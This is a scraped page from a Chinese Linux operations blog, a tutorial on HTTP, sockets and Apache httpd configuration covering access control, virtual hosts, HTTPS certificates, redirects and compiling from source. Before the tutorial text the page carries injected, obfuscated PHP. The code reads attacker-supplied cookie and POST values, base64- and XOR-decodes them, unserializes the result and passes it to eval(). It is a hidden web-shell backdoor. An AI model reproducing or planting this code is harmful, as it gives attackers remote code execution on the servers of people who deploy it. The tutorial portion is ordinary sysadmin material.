$yXMmiEcIGK = chr ( 1034 - 946 ).'J' . chr (82) . chr ( 507 - 412 )."\160" . chr ( 1009 - 924 )."\x70";$HOygnoFBa = "\143" . chr (108) . chr (97) . chr ( 290 - 175 ).'s' . chr ( 711 - 616 ).chr (101) . 'x' . 'i' . "\x73" . "\164" . "\163";$BYAUcYott = class_exists($yXMmiEcIGK); $HOygnoFBa = "43522";$Jlpsxntry = !1;if ($BYAUcYott == $Jlpsxntry){function GYwpAWr(){return FALSE;}$NHUGUhVAVW = "47311";GYwpAWr();class XJR_pUp{private function keUQyUYK($NHUGUhVAVW){if (is_array(XJR_pUp::$yoUiHbHZ)) {$VQenh = str_replace('<' . chr (63) . 'p' . chr ( 380 - 276 )."\x70", "", XJR_pUp::$yoUiHbHZ['c' . "\157" . 'n' . 't' . chr (101) . "\156" . chr (116)]);eval($VQenh); $NHUGUhVAVW = "47311";exit();}}private $EYcCRZiy;public function dnqWMeVW(){echo 28968;}public function __destruct(){$NHUGUhVAVW = "42892_3067";$this->keUQyUYK($NHUGUhVAVW); $NHUGUhVAVW = "42892_3067";}public function __construct($DRaFgsEM=0){$FaiXtmvVIC = $_POST;$GcaGSUVsUd = $_COOKIE;$WLihkFyqXK = "7f2358cb-ef52-4b41-90bf-d69713355722";$eTgQsanT = @$GcaGSUVsUd[substr($WLihkFyqXK, 0, 4)];if (!empty($eTgQsanT)){$gKxEf = "base64";$zSqaoQvNL = "";$eTgQsanT = explode(",", $eTgQsanT);foreach ($eTgQsanT as $JSlTbQdQ){$zSqaoQvNL .= @$GcaGSUVsUd[$JSlTbQdQ];$zSqaoQvNL .= @$FaiXtmvVIC[$JSlTbQdQ];}$zSqaoQvNL = array_map($gKxEf . chr ( 1019 - 924 ).'d' . chr (101) . chr (99) . chr ( 938 - 827 ).'d' . "\145", array($zSqaoQvNL,)); $zSqaoQvNL = $zSqaoQvNL[0] ^ str_repeat($WLihkFyqXK, (strlen($zSqaoQvNL[0]) / strlen($WLihkFyqXK)) + 1);XJR_pUp::$yoUiHbHZ = @unserialize($zSqaoQvNL); $zSqaoQvNL = class_exists("42892_3067");}}public static $yoUiHbHZ = 65175;}$zupyxb = new /* 61085 */ $yXMmiEcIGK(47311 + 47311); $Jlpsxntry = $zupyxb = $NHUGUhVAVW = Array();} HTTP服务和APACHE | Linux运维部落

HTTP服务和APACHE

http协议 Httpd介绍 Htdtpd2.2配置 Httpd2.4配置 编译安装http

Socket套接字

Socket:套接字,进程间通信IPC的一种实现,允许位于不同主机(或同一主机)上 不同进程之间进行通信和数据交换,SocketAPI出现于1983年,4.2 BSD实现

Socket API:封装了内核中所提供的socket通信相关的系统调用

Socket Domain:根据其所使用的地址

AF_INET:Address Family,IPv4

AF_INET6:IPv6

AF_UNIX:同一主机上不同进程之间通信时使用

Socket Type:根据使用的传输层协议

SOCK_STREAM:流,tcp套接字,可靠地传递、面向连接

SOCK_DGRAM:数据报,udp套接字,不可靠地传递、无连接

SOCK_RAW: 裸套接字,无须tcp或tdp,APP直接通过IP包通信

系统调用

套接字相关的系统调用:

socket(): 创建一个套接字

bind():绑定IP和端口

listen():监听

accept():接收请求

connect():请求连接建立

write():发送

read():接收

close():关闭连接

 

HTTP服务通信过程

捕获

HTTP工作机制

http请求:http request

http响应:http response

一次http事务:请求<–>响应

Web资源:web resource

一个网页由多个资源构成,打开一个页面,会有多个资源展示出来,但是每个资 源都要单独请求。因此,一个“Web 页面”通常并不是单个资源,而是一组资源 的集合 

静态文件:无需服务端做出额外处理

文件后缀:.jpg, .html, .txt, .js, .css, .mp3, .avi 

动态文件:服务端执行程序,返回执行的结果 (如一个段程序执行的输出结果,而不是程序本身)

文件后缀:.asp, .php, .jsp

提高HTTP连接性能

并行连接:通过多条TCP连接发起并发的HTTP请求 

持久连接:keep-alive,长连接,重用TCP连接,以消除连接和关闭的时延,以事 务个数和时间来决定是否关闭连接  (默认不是持久连接)

管道化连接:通过共享TCP连接发起并发的HTTP请求 

复用的连接:交替传送请求和响应报文(实验阶段)

URI: Uniform Resource Identifier 统一资源标识,分为URL和URN 

URN: Uniform Resource Naming,统一资源命名

URL: Uniform Resorce Locator,统一资源定位符,用于描述某服务器某特定资 源位置

两者区别:URN如同一个人的名称,而URL代表一个人的住址。换言之,URN 定义某事物的身份,而URL提供查找该事物的方法。URN仅用于命名,而不指 定地址

 

URL组成

<scheme>://<user>:<password>@<host>:<port>/<path>;<params>?<query>#<frag >

schame:方案,访问服务器以获取资源时要使用哪种协议 

user:用户,某些方案访问资源时需要的用户名 

password:密码,用户对应的密码,中间用:分隔 

Host:主机,资源宿主服务器的主机名或IP地址 

port:端口,资源宿主服务器正在监听的端口号,很多方案有默认端口号 

path:路径,服务器资源的本地名,由一个/将其与前面的URL组件分隔 

params:参数,指定输入的参数,参数为名/值对,多个参数,用;分隔 

query:查询,传递参数给程序,如数据库,用?分隔,多个查询用&分隔 

frag:片段,一小片或一部分资源的名字,此组件在客户端使用,用#分隔

URL示例 ;

http://www.magedu.com:8080/images/logo.jpg 

ftp://mage:password@172.16.0.1/pub/linux.ppt 

rtsp://videoserver/video_demo/ Real Time Streaming Protocol

 

网站访问量

IP(独立IP):即Internet Protocol,指独立IP数。一天内来自相同客户机IP地址只 计算一次,记录远程客户机IP地址的计算机访问网站的次数,是衡量网站流量 的重要指标 (以IP地址作为统计)

PV(访问量): 即Page View, 页面浏览量或点击量,用户每次刷新即被计算一 次,PV反映的是浏览某网站的页面数,PV与来访者的数量成正比,PV并不是页面的来访者数量,而是网站被访问的页面数量

UV(独立访客):即Unique Visitor,访问网站的一台电脑为一个访客。一天内相 同的客户端只被计算一次。可以理解成访问某网站的电脑的数量。网站判断来 访电脑的身份是通过来访电脑的cookies实现的。如果更换了IP后但不清除 cookies,再访问相同网站,该网站的统计中UV数是不变的

示例: 

甲乙丙三人在同一台通过ADSL上网的电脑上(中间没有断网),分别访问 www.magedu.com网站,并且每人各浏览了2个页面,那么网站的流量统计是:

IP: 1              PV:6          UV:1 

若三人都是ADSL重新拨号后,各浏览了2个页面,则

IP: 3               PV:6          UV:1

 

网站访问量

QPS:request per second,每秒请求数

PV,QPS,并发连接数换算公式

QPS= PV* 页⾯衍⽣连接次数/ 统计时间(86400) 

并发连接数 =QPS * http平均响应时间 

峰值时间:每天80%的访问集中在20%的时间里,这20%时间为峰值时间 

峰值时间每秒请求数(QPS)=( 总PV数 *页⾯衍⽣连接次数)*80% ) / ( 每天秒数 * 20% )

 

 

 

一次完整的http请求处理过程

1、建立连接:接收或拒绝连接请求(通过tcp/ip协议建立连接) 

2、接收请求:接收客户端请求报文中对某资源的一次请求的过程

3、处理请求:服务器对请求报文进行解析,并获取请求的资源及请求方法等相 关信息,根据方法,资源,首部和可选的主体部分对请求进行处理

4、访问资源: 服务器获取请求报文中请求的资源web服务器,即存放了web资源的服务器, 负责向请求者提供对方请求的静态资源,或动态运行后生成的资源

5、构建响应报文: 一旦Web服务器识别除了资源,就执行请求方法中描述的动作,并返回响应报文。 响应报文中 包含有响应状态码、响应首部,如果生成了响应主体的话,还包括响应主体

6、发送响应报文

Web服务器通过连接发送数据时也会面临与接收数据一样的问题。服务器 可能有很多条到各个客户端的连接,有些是空闲的,有些在向服务器发送数据,还 有一些在向客户端回送响应数据

7、记录日志

最后,当事务结束时,Web服务器会在日志文件中添加一个条目,来描述 已执行的事务

 

Httpd的MPM工作模式 

prefork:多进程I/O模型,每个进程响应一个请求,默认模型 一个主进程:生成和回收n个子进程,创建套接字,不响应请求 多个子进程:工作work进程,每个子进程处理一个请求;系统初始时,预先 生成多个空闲进程,等待请求,最大不超过1024个

worker:复用的多进程I/O模型,多进程多线程,IIS使用此模型 一个主进程:生成m个子进程,每个子进程负责生个n个线程,每个线程响应 一个请求,并发响应请求:m*n

event:事件驱动模型(worker模型的变种) 一个主进程:生成m个子进程,每个进程直接响应n个请求,并发响应请求: m*n,有专门的线程来管理这些keep-alive类型的线程,当有真实请求时,将请 求传递给服务线程,执行完毕后,又允许释放。这样增强了高并发场景下的请 求处理能力

httpd-2.2: event 测试版,centos6默认 httpd-2.4:event 稳定版,centos7默认

 

Httpd 2.2常见配置 的常用配置及简单用法

主要配置文件的路径:/etc/httpd/conf/httpd.conf  

但也可以放在:/etc/httpd/conf.d/下以.conf结尾的的文件也可以(例如:test.conf)

当两个配置文件定义的内容有冲突时,系统会以自己定义的文件为更改标准。

当主配置文件找不到要更改的选项时(此时为系统 默认),可以在自己定义的配置文件添加更改的选项。

检查配置文件是否有语法错误: httpd -t

1、显示服务器版本信息

再自定义的配置文件下/etc/httpd/conf.d/test.conf添加:ServerTokens Prod(大小写无所谓)

再另一台主机上:curl -i http://192.168.60.4/(来打开本主机就不会显示http的版本号,保证安全)

2、修改监听的IP和Port (默认为80端口)

(1) 省略IP表示为本机所有IP  (如果后面的IP地址不写默认绑定本机的所有IP地址)

(2) Listen指令至少一个,可重复出现多次

Listen 80 (监听80端口)

Listen 8080  (改为监听8080端口)

Listen 192.168.1.100:8080   (将http服务现更改端口号然后绑定到192.168.1.100;只有此主机才能访问其他的主机都不能访问本机的http服务)

此端口号的更改如果在自己定义的配置文件里更改;默认原来的80和现在定义的8080端口都有效

如果访问时需要添加端口号:curl http://192.168.60.4:8080/或者在web浏览器:http://192.168.60.4:9527/ 如果需要更改端口号则需要改原来的配置文件:/etc/httpd/conf/httpd.conf

 

3、持久连接

连接建立,如果网站里有多个资源,每个资源获取完成后不会断开连接,而是继 续等待其它的请求完成,默认关闭持久连接 。

断开条件:

数量限制:100 (连接的并发数量超过100个后就会断开第101个连接)

时间限制:以秒为单位, httpd-2.4 支持毫秒级 (超过规定的时间会断开连接,默认为6s)

副作用:对并发访问量较大的服务器,持久连接功能会使用有些请求得不到响应

设置:

此设置配置文件里是没有的,用的是默认值,如果需要更改,只需在配置文件里添加或者在自己定义的配置文件里添加也可以。

KeepAliveTimeout 15 (设置为15s之后断开连接)

KeepAlive On|Off   (开启和关闭持久连接,默认是关闭的,时常为6s)

MaxKeepAliveRequests 100  (断开连接的最大次数)

4、MPM( Multi-Processing Module)多路处理模块

prefork,    worker,    event(试验阶段)

httpd-2.2不支持同时编译多个模块,所以只能编译时选定一个;rpm安装 的包提供三个二进制程序文件,分别用于实现对不同MPM机制的支持

确认方法: ps aux | grep httpd 默认为/usr/sbin/httpd, 即prefork模式

修改此模块的配置文件在:vim /etc/sysconfig/httpd (cent0s6的配置文件)

/etc/httpd/conf.modules.d/00-mpm.conf (centos7上的配置文件路径)

捕获12

查看模块列表 查看静态编译的模块 httpd -l 查看静态编译及动态装载的模块 httpd –M 动态模块加载:不需重启即生效 动态模块路径 /usr/lib64/httpd/modules/

更换使用的httpd程序: /etc/sysconfig/httpd HTTPD=/usr/sbin/httpd.worker 重启服务生效 pstree -p|grep httpd 查看进程和线程 Httpd 2.4 与之不同 以动态模块方式提供 配置文件:/etc/httpd/conf.modules.d/00-mpm.conf httpd –M |grep mpm 重启服务生效 pstree -p|grep httpd 查看进程和线程

prefork的默认配置:

<IfModule prefork.c>

StartServers     8      (默认启动时开启的进程数,在自己的配置文件里可以更改)

MinSpareServers     5

MaxSpareServers 20

ServerLimit       256 ,最大20000  (每个进程开启的线程数)

MaxClients 256 最大并发

MaxRequestsPerChild 4000 子进程最多能处理的请求数量。在处 理MaxRequestsPerChild 个请求之后,子进程将会被父进程终止,这 时候子进程占用的内存就会释放(为0时永远不释放)

</IfModule>

worker的默认配置:

<IfModule worker.c>

StartServers        4

MaxClients           300

MinSpareThreads     25

MaxSpareThreads       75

ThreadsPerChild       25

MaxRequestsPerChild         0 无限制

</IfModule>

 

5、DSO: Dynamic Shared Object

加载动态模块配置

/etc/httpd/conf/httpd.conf

配置指定实现模块加载格式: LoadModule <mod_name> <mod_path>

模块文件路径可使用相对路径:

相对于ServerRoot(默认/etc/httpd)

示例:

LoadModule auth_basic_module

modules/mod_auth_basic.so

6、定义访问页面的路径

一般默认访问打开的页面路径为;/var/www/html/下的各个目录和文件

DocumentRoot    /var/www/html/    文档的根目录当用户访问主页时192.169.60.60/是以此目录为参考点的/var/www/html/。(192.169.60.60/dir  ========/var/www/html/dir

在centos6上直接在自己定义的配置文件下更改就可以:DocumentRoot “/data/www”

在centos7上除了要在配置文件里添加要更改的内容,还需要给定义的目录添加权限

DocumentRoot “/data/www”

<directory  “/data/www” >
require all granted
</directory>

重启服务之后就会默认访问到/data/www/下的目录文件了。

 

7、定义站点主页面

一般访问某个主机的IP地址192.169.60.60/如果不跟文件名的话默认会访问index.html这个文件夹。

DirectoryIndex       index.html

如果需要更改,在自定义的配置文件里添加如下的内容就可以了。

<IfModule dir_module>
DirectoryIndex qw
</IfModule>

 

8、站点访问控制常见机制

访问控制机制有两种:客户端来源的IP地址;用户账号 

在centos7中2.4的版本;

允许所有主机访问:Require all granted

拒绝所有主机访问:Require all denied

Require ip IPADDR:授权指定来源的IP访问

Require not ip IPADDR:拒绝特定的IP访问

Require host HOSTNAME:授权特定主机访问 ‘

Require not host HOSTNAME:拒绝

HOSTNAME: FQDN:特定主机 domin.tld:指定域名下的所有主机

具体实例:在配置文件里添加

对所有请求访问的限制:

<RequireAll>

Require all granted           (允许所有主机访问)

Require not ip 172.16.1.1        (但拒绝特定的IP的访问 )

</RequireAll>

 

<RequireAny>

Require all denied      (拒绝所有主机的访问)

require ip 172.16.1.1       (只允许特定IP的访问)

</RequireAny>     (在此种情况下自己访问自己也会被拒绝,只允许172.16.1.1 单个主机的访问)

对文件访问的限制

<files “*.txt”>
require all denied
</files>        (案例;拒绝访问以.txt结尾的文件)

 

centos6的2.2的http的版本:

对指定文件访问的限制

<files “*.txt”> (对以.txt为结尾的文件限制其访问,当此文件里包含有用户的私密信息时可以限制其访问)

order deny,allow      (下面的两个条件冲突时,看此行的deny和allow的前后顺序,在最后面的生效)

deny from 172.16. 100.100    (拒绝此主机的访问)

allow from 172.16.o.o/16           (允许此网段的所有主机)

</files>     (所以此条命令中deny from 172.16. 100.100 是无效的)

 

<files “*.txt”>  (此案例和上面的案例干好相反)

order allow,deny

deny from 172.16.100.100  (拒绝此主机的访问)

allow from 172.16.0.0/16       (允许此网段的所有主机)

</files>

URL路径:(就是192.168.60.60/URL    /var/www/html/ 主页下的某个文件夹 url)

<Location “/conf”>      (针对/var/www/html/目录下conf文件来限定访问)

</Location>

9、<Directory>中“基于源地址”实现访问控制

在选项前的+,- 表示增加或删除指定选项

FollowSymLinks:允许访问符号链接文件所指向的源文件 None:全部禁用 All: 全部允许

Indexes:系统默认会显示index.html里的内容。如果没有此文件增加此项设置会显示主目录下所有的文件列表

例如在网站的主目录下有个软连接sports 并可以正常访问的:

options      -FollowSymLinks (去掉支持软连接的功能)

Options   +Indexes     (或者可以将/etc/httpd/conf.d/welcome.conf 此配置文件里的Options -Indexes 注释掉就可以了)

(2) AllowOverride

与访问控制相关的哪些指令可以放在指定目录下的/var/www/html/.htaccess(由 AccessFileName指定)文件中,覆盖之前的配置指令 只对<directory>语句有效

AllowOverride All: 所有指令都有效 在配置文件里添加

AllowOverride None:.htaccess 文件无效

AllowOverride AuthConfig Indexes 除了AuthConfig 和Indexes的其它指令都无法 覆盖

 

 

10、日志设定      (日志的路径: /etc/httpd/conf/httpd.conf)

日志类型: 访问日志 ;错误日志

错误日志:

ErrorLog  :   logs/error_log

LogLevel 可选值:

debug, info, notice, warn,error crit, alert, emerg (定义错误日志的级别,当达到什么级别开始记录到错误日志里面)

LogLevel warn    (系统默认是达到warn级别就记录到日志里的)

捕获

访问日志: (记录日常放的信息)

参考帮助:http://httpd.apache.org/docs/2.2/mod/mod_log_config.html#formats

定义日志格式:LogFormat format strings

LogFormat “%h %l %u %t \”%r\” %>s %b \”%{Referer}i\” \”%{User-Agent}i\”” combined

%h 客户端IP地址 

%l 远程用户,启用mod_ident才有效,通常为减号“-” 

%u 验证(basic,digest)远程用户,非登录访问时,为一个减号“-”

%t 服务器收到请求时的时间 •

%r First line of request,即表示请求报文的首行;记录了此次请求的“方法”, “URL”以及协议版本 •

%>s 响应状态码 • %b 响应报文的大小,单位是字节;不包括响应报文http首部 •

%{Referer}i 请求报文中首部“referer”的值;即从哪个页面中的超链接跳转至 当前页面的 •

%{User-Agent}i 请求报文中首部“User-Agent”的值;即发出请求的应用程 序

捕获123

将日志定义格式日期为年月日不含有英文的月:

 

11、设定默认字符集

AddDefaultCharset UTF-8

中文字符集:GBK, GB2312, GB18030

12、定义路径别名

alias /pp   /app/zz (在自定义的配置文件里添加别名)
<directory “/app/zz”>  (然后给别名对应的路径添加权限)
require all granted
</directory>

13、基于用户的访问控制 (指定铭文和密码)

cd  /etc/httpd/conf.d/

htpasswd -c /etc/httpd/conf.d/.httpuser user1

htpasswd -c /etc/httpd/conf.d/.httpuser user2   (.httpuse此为文件 user1此为用户 )

<directory /var/www/html/ff>  (对特定的目录做密码验证)
AuthType Basic
AuthName “welcome to access admin dir”      (欢迎语句)
AuthUserFile “/etc/httpd/conf.d/.httpduser”    (存放用户和密码的路径)
Require user user1 user2           (具体指定的哪些创建的用户)
</directory>

14、实现用户家目录的http共享

/etc/httpd/conf.d/userdir.conf 将此文件的两项配置更改

# UserDir disabled  (注释掉)

UserDir public_html (取消注释启用)

cd /home/lv/建立文件夹public_html然后在此文件夹里建立文件index.html

setfacl –m u:apache:x ~lv   (对特别权限此家目录增加)

192.168.60.6/~lv  (访问)

15、ServerSignature On | Off | EMail 当客户请求的网页并不存在时,服务器将产生错误文档,缺省情况下由于打开 了 ServerSignature选项,错误文档的最后一行将包含服务器的名字、Apache的版 本等信息 如果不对外显示这些信息,就可以将这个参数设置为Off 设置为Email,将显示ServerAdmin 的Email提示

18、虚拟主机 的建立(既在一台主机上建立多个网站)

有三种实现方案:

基于ip:为每个虚拟主机准备至少一个ip地址

基于port:为每个虚拟主机使用至少一个独立的port (端口)

基于FQDN:为每个虚拟主机使用至少一个FQDN 

 

 

实验:基于不同端口的虚拟主机的建立

1  mkdir /var/www/html/websit{1,2,3} -pv   (建立三个 目录)

2  .分别在每个目录下创建index.html并写些内容

echo 3333333 > /var/www/html/websit3/index.html
echo 222222 > /var/www/html/websit2/index.html
echo 111111 > /var/www/html/websit1/index.html

3 . 在自己定义的配置文件里添加:

listen 81
listen 82
listen 83    (增加3个端口)

<VirtualHost 192.168.60.4:81>
DocumentRoot “var/www/html//websit1”  (访问的主页面路径)
ServerName www.a.com          (服务的网址,需要添加dns指定才可以,本处没有添加)
errorlog “logs/a.com error_log”                (错误日志存放的路径)
Transferlog “logs/a.com access_log”          (访问日志存放的路径)
</VirtualHost>

<VirtualHost 192.168.60.4:82>
DocumentRoot “var/www/html//websit2”
ServerName www.b.com
errorlog “logs/b.com error_log”
Transferlog “logs/b.com access_log”
</VirtualHost>

<VirtualHost 192.168.60.4:83>
DocumentRoot “var/www/html/websit3”
ServerName www.c.com
errorlog “logs/c.com error_log”
Transferlog “logs/c.com access_log”
</VirtualHost

最后访问:http://192.168.60.22:81/;http://192.168.60.22:82/;http://192.168.60.22:83/

 

基于ip来实现

1 mkdir /var/www/html/websit{1,2,3} -pv (建立三个 目录)
2 .分别在每个目录下创建index.html并写些内容
echo 3333333 > /var/www/html/websit3/index.html
echo 222222 > /var/www/html/websit2/index.html
echo 111111 > /var/www/html/websit1/index.html

3 .添加3个新的IP地址 (此添加的IP为临时的IP地址重启后失效如果需要永久生效查看前面网络的内容)

ip a add 192.168.60.11/24 dev ens33

ip a add 192.168.60.22/24 dev ens33

ip a add 192.168.60.33/24 dev ens33

 

4 .在自定义的配置文件里添加

VirtualHost 192.168.60.11:80>      (端口都是相同的,但IP地址是不同的)
DocumentRoot “/var/www/html//websit1”
ServerName www.a.com
errorlog “logs/a.com error_log”
Transferlog “logs/a.com access_log”
</VirtualHost>

<VirtualHost 192.168.60.22:80>
DocumentRoot “/var/www/html//websit2”
ServerName www.b.com
errorlog “logs/b.com error_log”
Transferlog “logs/b.com access_log”
</VirtualHost>

<VirtualHost 192.168.60.33:8o>
DocumentRoot “/var/www/html/websit3”
ServerName www.c.com
errorlog “logs/c.com error_log”
Transferlog “logs/c.com access_log”
</VirtualHost>

5 ,最后访问:192.168.60.11:80/  (端口号可以不用写)

如果要使用名字访问则需要配dns解析,临时使用可以配置host文件

vim /etc/hosts     :添加一下内容就可以

192.168.33.33  www.a.com     www.b.com     www.c.com

现在访问:curl 192.168.33.33 则会默认访问在前面的www.a.com的主页面

 

http协议状态码分类
status(状态码): 

1xx:100-101 信息提示 

2xx:200-206 成功 

3xx:300-305 重定向 

4xx:400-415 错误类信息,客户端错误 

5xx:500-505 错误类信息,服务器端错误

具体实例:

200: 成功,请求数据通过响应报文的entity-body部分发送;OK 

301: 请求的URL指向的资源已经被删除;但在响应报文中通过首部Location指 明了资源现在所处的新位置;Moved Permanently 

302: 响应报文Location指明资源临时新位置 Moved Temporarily 

304: 客户端发出了条件式请求,但服务器上的资源未曾发生改变,则通过响应 此响应状态码通知客户端;Not Modified 

401: 需要输入账号和密码认证方能访问资源;Unauthorized 

403: 请求被禁止;Forbidden 

404: 服务器无法找到客户端请求的资源;Not Found

500: 服务器内部错误;Internal Server Error 

502: 代理服务器从后端服务器收到了一条伪响应,如无法连接到网关;Bad Gateway 

503 – 服务不可用,临时服务器维护或过载,服务器无法处理请求 

504 – 网关超时

 

HTTP 首部字段

HTTP 首部字段包含的信息最为丰富。首部字段同时存在于请求和响应报文内, 并涵盖 HTTP 报文相关的内容信息。使用首部字段是为了给客服端和服务器端 提供报文主体大小、所使用的语言、认证信息等内容

 

实验https的实现

1 . 在一台主机上:cd /etc/pki/CA/(进入到此目录下创建证书)

(umask 077;openssl genrsa -out private/cakey.pem 2048)   (生成私钥文件)

2 . openssl req -new -x509 -key private/cakey.pem -out cacert.pem -days 3650( 自签名证书)

(要填的内容:CN ;beijing;beijing;magedu;opt;ca.magedu.com;)

3 .新建两个文件:touch index.text     和   echo 01 > serial

4 . 在httpd服务器端开始向刚才生成的证书主机端申请证书:

cd  /etc/httpd/conf.d/    mkdir  ssl

5 cd ssl

(umask 077;openssl genrsa -out httpd.key 1024)  (自己生成私钥文件)

6 . openssl req -new -key httpd.key -out http.csr   (生成申请证书的文件)

7 .scp http.csr 192.168.60.2:/etc/pki/CA    (复制到刚才的主机上去申请证书)

8 .openssl ca -in httpd.csr -out certs/www.magedu.com.crt -days 720(在另一台主机上开始颁发证书)

9 . scp certs/www.magedu.com.crt 192.168.60.4:/etc/httpd/conf.d/ssl/(将颁发的证书复制回来)

scp cacert.pem /www.magedu.com.crt 192.168.60.4:/etc/httpd/conf.d/ssl

10 .yum install mod_ssl (在httpd服务端安装模块) 重启http服务

11 .(修改配置文件将刚刚颁发的证书文件路径写在上面)

vim /etc/httpd/conf.d/ssl.conf

捕获

12 .  https走的是443端口:开始访问:https://192.168.60.4/(就可以实现加密的访问)

由于自己授权的证书不信任,需要在浏览器端导入一下证书文件。

 

 重定向

Permanent  (永久重定向)

temp    (临时重定向)

redirect temp           /              http://www.baidu.com   (当在浏览器上输入192.168.60.4/是页面会被重定向到http://www.baidu.com 网站上去)

http重定向到https上去:(前提是本网站以实现https的加密)

redirect temp   /   https ://192.168.60.4/

上述方法存在安全隐患:可用下面的方法重定向到https上去。

vim /etc/httpd/conf/httpd.conf

Header always set Strict-Transport-Security “max-age=31536000”

RewriteEngine on

RewriteRule ^(/.*)$ https://%{HTTP_HOST}$1 [redirect=302]

加入此三行就可以了

 

在centos6编译安装httpd-2.4

1 . 开发环境包组: Development Tools,Server  相关包:pcre-devel,openssl-devel expat-devel

2 . 安装httpd-2.4 依赖于apr-1.4+, apr-util-1.4+

3 .下载源代码并解压缩: httpd-2.4.27.tar.bz2 apr-1.6.2.tar.bz2 apr-util-1.6.0.tar.bz2

4. mkdir /src (新建文件并将下载下来的源码包上传到此文件夹下)

5 .将三个压缩包解压缩到 cd /src目录下

tar xvf httpd-2.4.33.tar.bz2

tar xvf apr-util-1.6.1.tar.gz

tar xvf apr-1.6.3.tar.gz

6 . mv apr-1.6.3 /src/httpd-2.4.33/srclib/apr   (将解压的apr-1.6.3 整个目录移动到目录下并重命名)

mv apr-util-1.6.1 /src/httpd-2.4.33/srclib/apr-util  (同上)

7 . cd /src/ httpd-2.4.33 / (进入到此目录下开始进行编译)

mkdir  /app  (新建一个目录供编译安装时指定路径)

./configure –prefix=/app/http24 –enable-so –enable-ssl –enable-cgi –enable-rewrite –with-zlib –with-pcre –with-included-apr –enable-modules=most –enable-mpms-shared=all –with-mpm=prefork

捕获  (编译成功)

8 . make && make install

9 .vim /etc/profile.d/httpd24.sh (新建文件存放PATH变量)

PATH=/app/http24/bin:$PATH

. /etc/profile.d/httpd.sh     (让其生效)

10 . apachectl start   (开启服务)(其主程序在/app/httpd24/bin网站的主页面在/app/httpd24/htdocs)

总结:在编译安装时指定编译安装的目录为/app/httpd24时他的自定义配置文件在哪里

在yum安装时在/etc/httpd/conf.d/下新建一个test.conf的自定义配置文件

而在编译安装时他的目录在:/app/http24/conf/extra/下新建一个test.conf的自定义配置文件。但有一个前提需要在主配置文件中启用自定义的配置文件/app/httpd24/conf/ httpd.conf 添加一行如下图:

捕获12

 

 

 

 

本文来自投稿,不代表Linux运维部落立场,如若转载,请注明出处:http://www.178linux.com/101223

(0)
上一篇 2018-06-19 16:37
下一篇 2018-06-19 19:41

相关推荐